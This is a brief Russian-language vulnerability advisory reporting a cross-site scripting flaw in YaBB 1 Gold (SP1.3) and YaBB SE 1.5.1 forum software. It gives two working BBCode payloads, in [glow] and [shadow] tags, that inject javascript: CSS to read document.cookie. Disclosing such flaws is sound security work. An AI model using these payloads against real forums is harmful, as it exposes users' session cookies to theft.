Программа: YaBB 1 Gold (SP1.3) и YaBB SE 1.5.1 

Уязвимость обнаружена в YaBB. Удаленный пользователь может выполнить XSS нападение. 

Пример: 

[glow=red);background:url(javascript:alert(document.cookie)); filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie)); filter:shadow(color=red,left,300]BigExploit[/shadow]



Оставить мнение